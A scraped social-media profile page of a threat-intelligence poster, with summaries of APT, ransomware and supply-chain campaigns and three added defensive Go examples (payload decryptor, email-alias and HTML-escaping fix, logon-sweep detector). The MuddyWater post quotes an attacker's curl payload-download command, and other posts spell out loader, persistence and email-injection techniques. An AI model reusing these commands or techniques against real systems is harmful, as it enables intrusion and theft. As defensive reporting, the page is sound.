N Shams
@Nav_the_Sham
1K posts

I am the cyber dungeon master. Link to Telegram: https://t.co/yyDSFb2mpP

Joined April 2020
112 Following, 477 Followers

Pinned Tweet
N Shams@Nav_the_Sham·
Pendar Kooshk Imen Company (PKIC) was hacked by an unknown threat actor, breaching its connection to Iran’s banking sector and compromising financial information for millions of Iranians. This is the third major incident within Iran’s banking sector in the last 2 months. Those affected by the compromise are:
• Banks (Melli, Sepah, Mellat, Tejerat, Middle East)
• Polyacryl Iran Company (polyacryliran[.]ir, polyacryl[.]ir, polyacryliran[.]com)
• Fipcoran (fipcoran[.]com)
• Multiple government and private entities
No known attribution is associated with this group, other than a transparent watermark of roses upon fire covering the screenshots provided demonstrating the group's access within PKIC systems, acting as a major threat to every organization using these services. Those same screenshots display software appearing to be authentic versions of ESXi, pfSense, Gitlab, and DSS Server used by their customers. The group had complete access into PKIC's infrastructure, including:
• Access to the virtualization platform managing PKIC server infrastructure (ESXi)
• Compromised customer credentials (i.e: Polyacryl Iran)
• Core cryptographic service APIs used in PKI operations
• Control over customer web hosting (185[.]110[.]188[.]10:2222)
• PKIC's internal source code (totaling 1.1 GB of files)
• Multiple administrative accounts exposed (i.e: e[.]sharifi[@]pki[.]co[.]ir)
PKIC’s compromise means attackers could potentially access transaction systems, account data, and authentication infrastructure, everything those digital locks protect, and it opens up the opportunity for spear phishing attacks using compromised emails (polyacryliancompany[@]gmail[.]com). This hack places risk on Iranian banks, and on those who use them. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #Iran #PKIC github.com/SetarehganAzad…
N Shams@Nav_the_Sham·
FamousSparrow (aka Earth Estries), a China-aligned Advanced Persistent Threat (APT) group, launched a multi-wave intrusion campaign targeting an Azerbaijani oil and gas company from late December 2025 through late February 2026. The attack most notably used an evolved DLL sideloading technique in order to override two specific exported functions within the malicious library. Attribution comes from the substantial overlap with the Earth Estries toolset and tradecraft, such as post-compromise command execution, DLL sideloading, Deed RAT deployment, Mofu-based staging, and Terndoor-style driver-backed behavior. Taken together, these give an intrusion chain that is consistent with FamousSparrow's ecosystem of tools. The operation was characterized by the deployment of two distinct backdoor families, Deed RAT and Terndoor, which were utilized across three separate waves of activity. The initial detection of the intrusion dates back to December 25, 2025, when the `w3wp.exe` process attempted to write a malicious web shell into a publicly accessible directory on the Exchange server, leaving the backdoors latent in infected systems after the cleanup. The next stage of the intrusion began with the execution of `C:\TEMP\LMIGuardianSvc[.]exe` (MD5: 0554f3b69d39d175dd110d765c11347a), which sideloaded `C:\TEMP\lmiguardiandll[.]dll`. That DLL initiated the execution chain of a backdoor later identified as `Deed RAT`, delivered through a three-component chain that blends seamlessly into the legitimate `LogMeIn Hamachi` ecosystem:
• LMIGuardianSvc.exe: Legitimate LogMeIn Hamachi binary (MD5: 0554f3b69d39d175dd110d765c11347a)
• LMIGuardianDll.dll: Malicious loader that patches a Windows API and stages the payload
• .hamachi.lng: Encrypted Deed RAT payload
The second stage occurs later, when `LMIGuardianSvc.exe` continues its normal execution and eventually calls the `ComMain` export.
From there, the legitimate service flow leads to a call to `StartServiceCtrlDispatcherW`. Because that API was previously patched during `Init`, the call is transparently diverted into the malicious loader function. The loader then restores the original bytes of `StartServiceCtrlDispatcherW`, ensuring that the hook is removed after use. The `.hamachi.lng` file contains the next-stage shellcode along with the `Deed RAT` payload. It is decrypted using AES-128 in CBC mode with an initialization vector of 16 null bytes. The decryption key is derived from the first 16 bytes of the file, while the remainder represents the encrypted payload. Once decrypted, the shellcode is executed directly in memory, completing the transition from staged components to an active backdoor. This intrusion should not be viewed as an isolated compromise, but as a sustained and adaptive operation conducted by an actor that repeatedly sought to regain and extend access within the victim's environment. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT businessinsights.bitdefender.com/famoussparrow-…
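An added example, written for this page and not taken from the post or from Bitdefender's report, of the staged-file layout described above: a small Go analyst utility that splits a `.hamachi.lng`-style blob into its leading 16-byte key and the ciphertext that follows, then decrypts that remainder with AES-128-CBC and an all-zero IV, exactly as the post describes. The post says nothing about padding, so `DecryptStaged` returns the raw plaintext; `StripPKCS7` and the `BuildFixture` helper (which assembles a constructed blob in the same layout so the routine can be exercised offline) assume PKCS#7 padding purely for that fixture. The function names, the sample key and the sample content are all constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"errors"
	"fmt"
)

// keyLen is the size of the AES-128 key that, per the write-up, occupies the first
// 16 bytes of the staged file; everything after it is the CBC ciphertext.
const keyLen = 16

// SplitStagedFile separates a .hamachi.lng-style blob into its embedded key and ciphertext.
// It rejects blobs too short to hold a key plus one cipher block, and ciphertext that is
// not block-aligned, since CBC cannot decrypt a partial block.
func SplitStagedFile(blob []byte) (key, ct []byte, err error) {
	if len(blob) < keyLen+aes.BlockSize {
		return nil, nil, errors.New("blob too short to hold a 16-byte key and one cipher block")
	}
	key, ct = blob[:keyLen], blob[keyLen:]
	if len(ct)%aes.BlockSize != 0 {
		return nil, nil, fmt.Errorf("ciphertext length %d is not a multiple of %d", len(ct), aes.BlockSize)
	}
	return key, ct, nil
}

// DecryptStaged recovers the staged payload with AES-128-CBC and an IV of 16 null bytes.
// The post does not describe a padding scheme, so the raw decrypted bytes are returned.
func DecryptStaged(blob []byte) ([]byte, error) {
	key, ct, err := SplitStagedFile(blob)
	if err != nil {
		return nil, err
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	iv := make([]byte, aes.BlockSize) // 16 null bytes, as described in the post
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pt, nil
}

// StripPKCS7 removes PKCS#7 padding when the tail is well-formed, reporting false otherwise.
// Whether the real payload is padded this way is an assumption made only for the fixture.
func StripPKCS7(b []byte) ([]byte, bool) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, false
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, false
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, false
		}
	}
	return b[:len(b)-n], true
}

// BuildFixture assembles a constructed blob in the same key-prefixed layout so the decryptor
// can be exercised offline. It is test scaffolding, not a reproduction of the actor's tooling.
func BuildFixture(key, plaintext []byte) ([]byte, error) {
	if len(key) != keyLen {
		return nil, errors.New("fixture key must be 16 bytes")
	}
	padLen := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(padLen)}, padLen)...)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, padded)
	return append(append([]byte{}, key...), ct...), nil
}

func main() {
	// Constructed sample: neither the key nor the content is taken from a real file.
	blob, err := BuildFixture([]byte("constructed-key!"), []byte("constructed sample payload bytes"))
	if err != nil {
		panic(err)
	}
	pt, err := DecryptStaged(blob)
	if err != nil {
		panic(err)
	}
	if unpadded, ok := StripPKCS7(pt); ok {
		fmt.Printf("recovered %d bytes: %q\n", len(unpadded), unpadded)
	}
}
```

On a real sample the analyst would read the blob from disk and inspect the plaintext for a shellcode stub rather than expect text; the length and alignment checks in `SplitStagedFile` are the quick triage test that a file actually follows the key-prefixed layout before any decryption is attempted.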
N Shams@Nav_the_Sham·
`Open-OSS/privacy-filter`, a popular artificial intelligence repository on Hugging Face, turned out to be a malicious package that disguised itself as a legitimate privacy filtering tool. The attacker's primary target was Windows machines. The model card used was nearly verbatim from OpenAI’s own Privacy Filter project, and they boosted their initial numbers to 244 downloads and 77 likes in under one hour, with the artificially inflated numbers used to push the repository into the spotlight and attract more victims. Once installed on the machine, it would act as normal and, in the background, install a `startbat` file on Windows, or a Python `loaderpy` script on Linux or macOS. A decoy piece of code that looked like a real loader then called a function named `verifychecksumintegrity`, which disabled SSL verification, decoded a base64-encoded URL pointing to `jsonkeeper[.]com`, fetched a JSON document, and extracted the `cmd` field. That command was passed directly to `PowerShell`, running silently with execution policy bypassed. It would then, in the following order:
• Create Microsoft Defender exclusions
• Create a scheduled task named `MicrosoftEdgeUpdateTaskCore` for persistence
• Install a 10 MB Rust-based infostealer
Once it was active, the infostealer would then go through the host machine, launching eight parallel collection modules targeting:
• Chrome and Firefox browser cookies
• Login data
• Saved passwords
• Session cookies
• SSH keys
• VPN configurations
• FTP credentials
• Cryptocurrency wallet files
All stolen data was then compressed and sent to a command-and-control server at recargapopular[.]com using a `POST` request with a Bearer token authorization header. This attack is possibly linked to the same unknown attacker account who, on April 24, 2025, had six other repositories uploaded that contained nearly identical loader functionality.
#ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #HuggingFace #LLM #AI #OpenAI bleepingcomputer.com/news/security/…
N Shams@Nav_the_Sham·
@Demoncoon @AvantrisLegends To a similar effect, prestidigitation lets you soil an object; you could cast piss yourself in the middle of the BBEG monologue.
Darkmask Demoncoon@Demoncoon·
@AvantrisLegends Fun fact: With the spell Prestidigitation, which is a Cantrip mind you, you can make any liquid smell and taste like piss. I've used the spell before to create a minor sound effect behind an annoying fellow player and add the smell of a fresh fart! ;)
N Shams@Nav_the_Sham·
OceanLotus (aka APT32), a Vietnam-aligned hacking group, has infected three packages on the Python Package Index (PyPI) repository, designed to stealthily deliver a previously unknown malware family called `ZiChatBot`.
• `uuid32-utils` (1,479 downloads)
• `colorinal` (614 downloads)
• `termncolor` (387 downloads)
Current attribution comes from Kaspersky, who says this current attack has a "64% similarity" to OceanLotus. Similar methods, like poisoned Visual Studio Code projects, were used for previous attacks. All three packages were uploaded to PyPI between July 16 and 22, 2025. Both `uuid32-utils` and `colorinal` use similar `ZiChatBot` payloads, while `termncolor` uses `colorinal` as a dependency. Once the package installs, it will extract:
• `terminate.dll` (establishes auto-run entries for `Windows`, and runs code to delete itself from the host)
• `terminate[.]so` (establishes the malware for `Linux` in crontab, and /tmp/obsHub/obs-check-update)
Regardless of the operating system it's running on, `ZiChatBot` is designed to execute shellcode received from its C2 server. After executing the command, the malware sends a heart emoji as a response to signal the server that the operation was successful. If the PyPI supply chain campaign is indeed the work of OceanLotus, it represents the threat actor's strategy to expand its targeting scope. #ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT32 #OceanLotus thehackernews.com/2026/05/pypi-p…
N Shams@Nav_the_Sham·
In early 2026, MuddyWater (Seedworm), an Iranian state-backed threat group, operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, using it to obfuscate ransomware attacks. Microsoft Teams was the main attack vector, where they used interactive screen-sharing to:
• Harvest credentials
• Manipulate Multi-Factor Authentication (MFA)
Initial attribution comes from MuddyWater adopting alternative ransomware branding, in an effort to reduce attribution and maintain plausible deniability. With the apparent absence of file encryption representing a deviation from typical ransomware behavior, the inconsistency indicates that the ransomware component may have functioned primarily as a facilitating or obfuscation mechanism. Initial access came from leveraging Microsoft Teams, where the threat actor engaged employees through external chat requests, using an interactive screen-sharing exploit to compromise users. The attacker then conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access. They then established persistence using remote access tools such as `DWAgent` and `AnyDesk`, before deploying additional payloads and furthering control of the environment. The TA would later execute commands via `RDP` to download additional payloads using curl:
• `curl hxxp[://]172.86.126[.]208:443/ms_upd[.]exe -o C:\ProgramData\ms_upd[.]exe`
Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations. The assessed link to MuddyWater indicates a continued evolution in the group’s operational approach, including the apparent use of RaaS ecosystems and branding to obscure attribution. This aligns with broader trends in which state-aligned actors adopt criminal tactics to introduce ambiguity and delay defensive response.
#ThreatIntel #Cyber #CyberSecurity #CyberSecurityNews #APT #IranAPT #IranWar rapid7.com/blog/post/tr-m…
N Shams@Nav_the_Sham·
Silver Fox (also known as CL-STA-0048), a threat group based in China, has been linked to a new campaign using a previously undocumented backdoor called `ABCDoor`, targeting organizations in Russia and India with phishing attacks using:
• ABCDoor (previously undocumented Python backdoor)
• ValleyRAT (functions as a loader for ABCDoor)
• RustSL (open-source shellcode loader and antivirus bypass framework; unpacks the encrypted malicious payload)
The starting point of the attack chain is a phishing email containing a PDF file, which features two clickable links to a ZIP or RAR archive hosted on `abc.haijing88[.]com`. Once clicked, `ABCDoor` gets unpacked and loaded into the host system. (Newer versions of `RustSL` have expanded to include the geographic region of Japan.) `ABCDoor` establishes persistence through Windows Registry Run keys and scheduled tasks, then communicates with its command-and-control (C2) servers over HTTPS using asynchronous Socket[.]IO messaging, running under a legitimate `pythonw.exe` process to evade detection. The malware focuses on covert remote interaction capabilities:
• Multi-monitor screen streaming via FFmpeg
• Remote mouse and keyboard control
• Clipboard theft
• File operations
• Limited file-encryption features
• Self-updating and self-removal
• Collects extensive host metadata
However, it leaves forensic artifacts in the registry and `%LOCALAPPDATA%` directories that defenders can monitor for detection. While primarily focused on targeting organizations in Taiwan, North America and Japan, the recent campaign is significant in that it shows the group expanding its regional focus for the first time to targets in Russia and India. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel #SilverFox #APT #China darkreading.com/endpoint-secur…
N Shams@Nav_the_Sham·
313 Team (Iranian-aligned Iraqi hacktivist group) is disrupting Canonical’s Ubuntu web infrastructure, putting it under a sustained DDoS attack and escalating the disruption into an extortion attempt, making updates and security patching unable to go through. 313 Team carried out similar attacks against Bluesky (April 15–16), Mastodon's flagship server (April 20), and eBay (April 26–27), with messages on Telegram claiming attribution for the attacks. Canonical has confirmed their web infrastructure is under fire. The group is explicitly demanding payment to stop the flood of packets; the sustained DDoS attack began over 18+ hours ago and has taken a large portion of Canonical’s Ubuntu servers completely offline, including:
• Downloads
• Package repositories
• Bug tracking
• Code hosting
• Authentication systems
However, the core OS and updates remain unaffected, and if you run Ubuntu on your VPS, your local instance is safe. Expect instability when hitting official docs or mirrors if the backend is still being flooded. #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews #Ubuntu #Linux
N Shams@Nav_the_Sham·
APT34 (also known as OilRig and Helix Kitten) is an Iranian state-backed threat group, which has now deployed a new attack using LSB steganography to conceal command and control configurations inside Google Drive images. The group has been active since 2014, with known targets across the Middle East, Europe, Asia, and the United States. Attribution comes from historical APT34 tactics shown through this attack, including the use of:
• Excel workbook events
• VBA macros with Base64 decoding
• Scheduled tasks for persistence
• Persian language comments
The attack begins with a malicious Excel file themed around Iranian nationwide protests, using social engineering lures like “Tehran final list” to trick victims into enabling macros. Once macros are enabled, the VBA code decodes C# source code from `CustomXMLParts`, using the legitimate Windows compiler `csc.exe` to compile it into a malicious loader. This fileless technique helps the malware evade traditional antivirus detection by avoiding dropping pre-compiled executables onto the disk. This campaign represents a significant evolution from OilRig’s earlier operations, shifting from basic Excel macro-based loaders to sophisticated multi-stage attack chains featuring cloud service abuse, steganographic concealment, and fileless in-memory execution. #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews #APT34 #IranAPT #IranWar gbhackers.com/oilrig-hides-c…
N Shams@Nav_the_Sham·
Robinhood users were hit with a new phishing attack taking advantage of Gmail's native `dot alias` and flaws in Robinhood's account creation process, sending users to:
• robinhood[.]casevaultreview[.]com
Social engineering attacks have accounted for $306 million in losses since the start of 2026. Customers were likely phished using a list of known customer emails from a Robinhood leak in November 2021. The data breach leaked five million email addresses, with the data offered for sale on `Cybercrime Forums`. Attackers abused Robinhood to generate phishing emails by exploiting a flaw in the company's onboarding process that allowed them to inject arbitrary HTML into its account confirmation emails, following this series of steps:
1. "jane.smith@gmail.com" and "janesmith@gmail.com" are treated as the same inbox, while Robinhood treats them as different emails.
2. The attacker registers a new Robinhood account using a similar email, with or without the period, per account.
3. Sets the optional “device name” field on Robinhood to HTML.
4. Robinhood's "unrecognized activity" email renders it unsanitized, which Gmail treats as formatting instructions.
The result is a real email from "noreply@robinhood[.]com" that passes SPF, DKIM, and DMARC. Recipients received what appeared to be a standard login alert, but with an embedded phishing section warning of "unrecognized activity" and urging them to review their account. As seen below: #ThreatIntel #Cyber #CyberSecurity #CybersecurityNews bleepingcomputer.com/news/security/…
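The two defects the post describes (an onboarding flow that treats dot-variant Gmail addresses as distinct accounts, and a user-controlled "device name" rendered unescaped into an HTML email) each have a small, standard fix. The Go code below is an added example written for this page; it is not Robinhood's code and not from the BleepingComputer article. It assumes a hypothetical `Registry` account store keyed by a canonical address, folds case for every domain, drops dots from the local part only for `gmail.com` (the dot-alias behaviour the post names), and HTML-escapes the device name before it is placed in the alert template. Addresses and the alert wording are constructed.

```go
package main

import (
	"fmt"
	"html"
	"strings"
)

// CanonicalEmail returns a normalized key used only for duplicate detection (never as the
// delivery address). For gmail.com, dots in the local part are ignored, so "jane.smith@" and
// "janesmith@" collapse to one key. Other domains are only case-folded, since dot
// insensitivity is a Gmail behaviour, not a general rule.
func CanonicalEmail(addr string) (string, error) {
	at := strings.LastIndex(addr, "@")
	if at <= 0 || at == len(addr)-1 {
		return "", fmt.Errorf("malformed address %q", addr)
	}
	local, domain := strings.ToLower(addr[:at]), strings.ToLower(addr[at+1:])
	if domain == "gmail.com" {
		local = strings.ReplaceAll(local, ".", "")
	}
	return local + "@" + domain, nil
}

// Registry is a hypothetical stand-in for the account store, keyed by canonical address.
type Registry struct {
	accounts map[string]string // canonical key -> address as originally supplied
}

func NewRegistry() *Registry { return &Registry{accounts: map[string]string{}} }

// Register refuses a sign-up whose canonical form already exists, closing the
// "same inbox, different account" gap the post describes.
func (r *Registry) Register(addr string) error {
	key, err := CanonicalEmail(addr)
	if err != nil {
		return err
	}
	if prev, exists := r.accounts[key]; exists {
		return fmt.Errorf("%s maps to the same inbox as existing account %s", addr, prev)
	}
	r.accounts[key] = addr
	return nil
}

// SafeDeviceName escapes a user-supplied device name so that it renders as literal
// text in an HTML email rather than as markup.
func SafeDeviceName(name string) string {
	return html.EscapeString(name)
}

// RenderAlert builds a constructed "new device" notification body with the device name escaped.
func RenderAlert(deviceName string) string {
	return "<p>We noticed a login from a new device: <b>" + SafeDeviceName(deviceName) + "</b></p>"
}

func main() {
	r := NewRegistry()
	for _, a := range []string{"jane.smith@gmail.com", "janesmith@gmail.com", "Jane.Smith@example.com"} {
		if err := r.Register(a); err != nil {
			fmt.Println("rejected:", err)
		} else {
			fmt.Println("registered:", a)
		}
	}
	// A device name carrying markup comes out as inert text, not a rendered link.
	fmt.Println(RenderAlert(`<a href="https://phish.invalid">Review account</a>`))
}
```

The canonical key is deliberately kept separate from the stored address: mail is still sent to the form the user typed, and only the uniqueness check uses the collapsed form. Escaping at the point of rendering, rather than at input time, means the stored device name stays faithful to what the user entered while every template that displays it is protected.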
N Shams@Nav_the_Sham·
Pendar Kooshk Imen Company (PKIC) has been hacked, potentially leaving major Iranian banking information compromised. With the recent financial and banking problems in Iran, it needs a deeper analysis. An update will come over the next couple of days. Considering banks such as Melli and Sepah were disrupted back in March as well, what will happen now with PKIC’s compromise? #ThreatIntel #cyber #CyberSecurity #CybersecurityNews github.com/SetarehganAzad… t.me/SalsabilNetwor…
N Shams@Nav_the_Sham·
`Firestarter` backdoor survived security patches and firewall updates, persisting as an active threat on Cisco devices running ASA or Firepower Threat Defense (FTD) software, maintaining post-patching persistence and enabling threat actors to re-access compromised devices without re-exploiting vulnerabilities. The backdoor has been attributed to a threat actor that Cisco Talos internally tracked as UAT-4356, known for cyber espionage campaigns, including `ArcaneDoor`. Two now-patched CVEs were used to initially get on a system:
• CVE-2025-20333 (allowed a remote attacker with valid VPN user credentials to execute arbitrary code as root)
• CVE-2025-20362 (allowed a remote attacker to access restricted URL endpoints)
Once `Firestarter` nests on the devices, it maintains persistence across reboots, firmware updates, and security patches. Furthermore, the backdoor relaunches automatically if terminated. Persistence is achieved by hooking into LINA, the core Cisco ASA process, and uses signal handlers that trigger reinstallation routines, with copies stored in:
• /opt/cisco/platform/logs/var/log/svc_samcore.log
• usr/bin/lina_cs
These are triggered when a process termination signal is received, also known as a graceful reboot. Devices compromised prior to patching may remain vulnerable because `Firestarter` is not removed by firmware updates. Reimaging and upgrading the device using the fixed releases is currently the only guaranteed way to remove it. #ThreatIntel #CybersecurityNews #CyberSecurity bleepingcomputer.com/news/security/…
N Shams@Nav_the_Sham·
Tropic Trooper is conducting a new campaign targeting Chinese-speaking individuals with a trojanized version of the SumatraPDF reader, deploying a custom AdaptixC2 Beacon and abusing VS Code tunnels for remote access. Zscaler ThreatLabz discovered the campaign last month, attributing it to Tropic Trooper (aka APT23, Earth Centaur, KeyBoy, and Pirate Panda), a group known for targeting various entities in Taiwan, Hong Kong, and the Philippines since 2011. The staging server involved in the intrusion, 158[.]247[.]193[.]100, was observed hosting a Cobalt Strike Beacon and a custom backdoor called EntryShell, both of which were used by Tropic Trooper in the past. #ThreatIntel #CybersecurityNews #CyberSecurity thehackernews.com/2026/04/tropic…
N Shams@Nav_the_Sham·
GopherWhisper, a previously undocumented China-aligned APT group, targeted Mongolian government entities and other actors, with their attacks leveraging Discord, Slack, Microsoft 365 Outlook, and file[.]io for command and control (C&C) communications and exfiltration. GopherWhisper was tied to current attacks with previously unattributed malware, identified by `ESET`. This, along with metadata obtained from the C2 server, shows little activity outside the 8 a.m. to 5 p.m. working-hour interval, which lined up with UTC+8, further attributing the attacks to a China-based group. A wide range of tools and implants were used, with Go being the most common language used in creating their malware. Of the seven tools that were discovered, four are backdoors:
• LaxGopher (written in Go)
• RatGopher (written in Go)
• BoxOfFriends (written in Go)
• SSLORDoor (written in C++)
ESET also found an injector (JabGopher), a Go-based exfiltration tool (CompactGopher), and a malicious DLL file (FriendDelivery). This is part of a continued campaign in Asia, with GopherWhisper and other China-based actors escalating attacks. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel #APT eset.com/us/about/newsr…
N Shams@Nav_the_Sham·
`The Gentlemen`, a ransomware-as-a-service (RaaS), is rapidly gaining popularity, claiming over 1,570 victims, with the majority of attacks (240) occurring in the first months of 2026. The group's ransomware, made in Go, affects Windows, Linux, and BSD, with ESXi implemented in C. Infrastructure includes:
• 45.86.230[.]112 and 91.107.247[.]163 (C2 server)
• Ports 443 and later 80
SystemBC (a proxy malware) is directly integrated into `The Gentlemen` ransomware ecosystem. When deployed, SystemBC establishes a SOCKS5 network, typically deployed as part of human-operated intrusion workflows rather than massive targeting. The precise initial access vector has not been conclusively determined, with the earliest known stage of the adversary's presence being on a Domain Controller with Domain Admin-level privileges. From that position, the attacker appeared to have performed systematic credential validation and host accessibility testing across the environment, reflected in an initial pattern of failed network logons followed by successful authentications originating from the Domain Controller. This sequence is consistent with a controlled effort to verify privileged access and identify viable systems before expanding operations more broadly. The attacker then disables Windows Defender real-time monitoring and establishes persistence with:
• Storing the payload throughout numerous systems under different filenames
• Scheduled task-based persistence
• Service-based persistence
Active Directory’s own Group Policy infrastructure can then detonate the ransomware simultaneously on every computer in the domain, compromising every host, allowing credential harvesting, followed by various other effects. The culmination of deployments of `The Gentlemen` RaaS payloads is rapidly increasing. `The Gentlemen` are now blatantly advertising their services across multiple underground forums, promoting their ransomware platform and persuading other technically skilled actors to join their group.
At this time, it's still unknown where the group is currently based. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel research.checkpoint.com/2026/dfir-repo…
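The "failed network logons followed by successful authentications from the Domain Controller" pattern in the post is one of the few early signals a defender gets before a domain-wide detonation, and it is easy to express as a rule. The Go code below is an added example written for this page, not code from the post or from Check Point's report. It works over a constructed, simplified logon record (source host, target host, outcome, timestamp, the fields one would project out of Windows 4624/4625 events) and flags any source that, within a time window, produced at least `minFailures` failures and then succeeded against at least `minTargets` distinct hosts. The hostnames, timestamps and thresholds are all constructed; the thresholds are tuning assumptions, not values from the report.

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// LogonEvent is a constructed, simplified view of a network logon record.
type LogonEvent struct {
	Time    time.Time
	Source  string // host the logon originated from
	Target  string // host that was authenticated to
	Success bool
}

// Finding describes a source that showed the fail-then-succeed sweep pattern.
type Finding struct {
	Source   string
	Failures int
	Targets  []string // distinct targets on which a success followed earlier failures
}

// DetectCredentialSweep flags sources where, within window, at least minFailures failed
// logons were followed by successful logons to at least minTargets distinct hosts.
// A single source sweeping many hosts this way is the Domain-Controller-origin pattern
// described in the write-up; one typo'd password followed by one success is not.
func DetectCredentialSweep(events []LogonEvent, window time.Duration, minFailures, minTargets int) []Finding {
	bySource := map[string][]LogonEvent{}
	for _, e := range events {
		bySource[e.Source] = append(bySource[e.Source], e)
	}
	var findings []Finding
	for src, evs := range bySource {
		sort.Slice(evs, func(i, j int) bool { return evs[i].Time.Before(evs[j].Time) })
		failures := 0
		var firstFail time.Time
		succeeded := map[string]bool{}
		for _, e := range evs {
			if !e.Success {
				if failures == 0 {
					firstFail = e.Time
				}
				failures++
				continue
			}
			// A success only counts once enough failures have accumulated inside the window.
			if failures >= minFailures && e.Time.Sub(firstFail) <= window {
				succeeded[e.Target] = true
			}
		}
		if len(succeeded) >= minTargets {
			targets := make([]string, 0, len(succeeded))
			for t := range succeeded {
				targets = append(targets, t)
			}
			sort.Strings(targets)
			findings = append(findings, Finding{Source: src, Failures: failures, Targets: targets})
		}
	}
	sort.Slice(findings, func(i, j int) bool { return findings[i].Source < findings[j].Source })
	return findings
}

// SampleEvents returns constructed events: DC01 fails against several hosts and then succeeds
// broadly, while WS07 has one failed attempt followed by one success (benign noise).
func SampleEvents() []LogonEvent {
	base := time.Date(2026, 1, 10, 2, 0, 0, 0, time.UTC)
	at := func(m int) time.Time { return base.Add(time.Duration(m) * time.Minute) }
	return []LogonEvent{
		{at(0), "DC01", "SRV-FILE01", false},
		{at(0), "DC01", "SRV-SQL02", false},
		{at(1), "DC01", "WS-HR03", false},
		{at(1), "DC01", "SRV-BACKUP", false},
		{at(2), "DC01", "SRV-FILE01", true},
		{at(2), "DC01", "SRV-SQL02", true},
		{at(3), "DC01", "WS-HR03", true},
		{at(5), "WS07", "SRV-FILE01", false},
		{at(6), "WS07", "SRV-FILE01", true},
	}
}

func main() {
	for _, f := range DetectCredentialSweep(SampleEvents(), 30*time.Minute, 3, 2) {
		fmt.Printf("source %s: %d failed logons, then success on %v\n", f.Source, f.Failures, f.Targets)
	}
}
```

In production the same logic would run over a SIEM query rather than an in-memory slice, and the source filter would usually be narrowed to domain controllers and other tier-0 hosts, since successful logons fanning out from those after a burst of failures is exactly the stage the post places before Defender tampering and GPO-driven deployment.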
N Shams@Nav_the_Sham·
After a quiet period since 2023, Mustang Panda (TA416) reemerged in mid-2025, now targeting India and South Korea in the Indo-Pacific region, using spear-phishing attacks to infect the host machine with a sideloaded DLL. Currently known attack vectors are:
• Victorcha707@gmail.com (phishing email)
• Impersonated Victor Cha (former Director for Asian Affairs for NSC)
• 72[.]81[.]60[.]97 (previous C2 server)
Current attribution is Mustang Panda, who favors medium-complexity repeatable execution techniques, most notably the extensive use of DLL sideloading to deploy custom implants (LotusLite) via benign or trusted executables, while demonstrating repeated reuse of infrastructure and tooling. Messages sent to targets in India seem to be disguised as basic IT help desk issues, with victims prompted to open a malicious file. Once viewed, the file triggered the sideloading attack with the latest variant of LotusLite, featuring some minor edits to more easily evade cybersecurity detection tools. It is superficially disguised to mimic legitimate banking software in the region, where many of its targets were prompted with the pop-up window message "HDFC Bank". As the malware initiates, it begins to load the binary into memory and executes multiple string-concatenation-based operations, spawning two functions: one to establish persistence and spawn a decoy file, while the other file is responsible for the malware's beaconing functionality. A significant portion of the implant logic is executed before `DllMain` is reached, through the Microsoft C Runtime (CRT) initialization, leveraging `_initterm`. Iterating over a linker-generated array of function pointers (located in .CRT$XC* sections), it invokes each non-null function, initializing an array of functions, and sets up values for Mutexes and the directory location for persistence, as well as the address for the command-and-control (C2) server.
The C2 server relies on Windows `WinHTTP` to connect to its command-and-control server, with the currently known packet structure shown in the image below. When the malware starts, it enumerates the names of the machine, along with the target’s username. It then proceeds to execute a predefined set of instructions, which can be dynamically leveraged based on the threat actor’s operational requirements:
• Creation of an interactive cmd.exe shell
• Terminate the interactive shell
• Various file operations
• Checks the status of the current beacon and reports back to the C2 server
The malware persists with the following:
• Checks the status of the current beacon and reports back to the C2 server, reporting on C:\ProgramData\Technology360NB
• SHSetValueA value created under Run Key
• Exports two dummy functions known as `EvtNext` and `EvtQuery`
Mustang Panda's attacks against India's financial sector are also almost certainly motivated by intelligence gathering, not financial gain. India's banking sector, particularly institutions like HDFC Bank, sits at the intersection of several strategic intelligence interests. Financial institutions have visibility into cross-border transactions, government-linked accounts, infrastructure financing, and trade flows, all of which are valuable to a state-aligned actor. Access to this type of data can provide insight into capital movement, economic relationships, and internal policy direction. #Malware #CyberSecurity #CybersecurityNews #ThreatIntel darkreading.com/cyberattacks-d…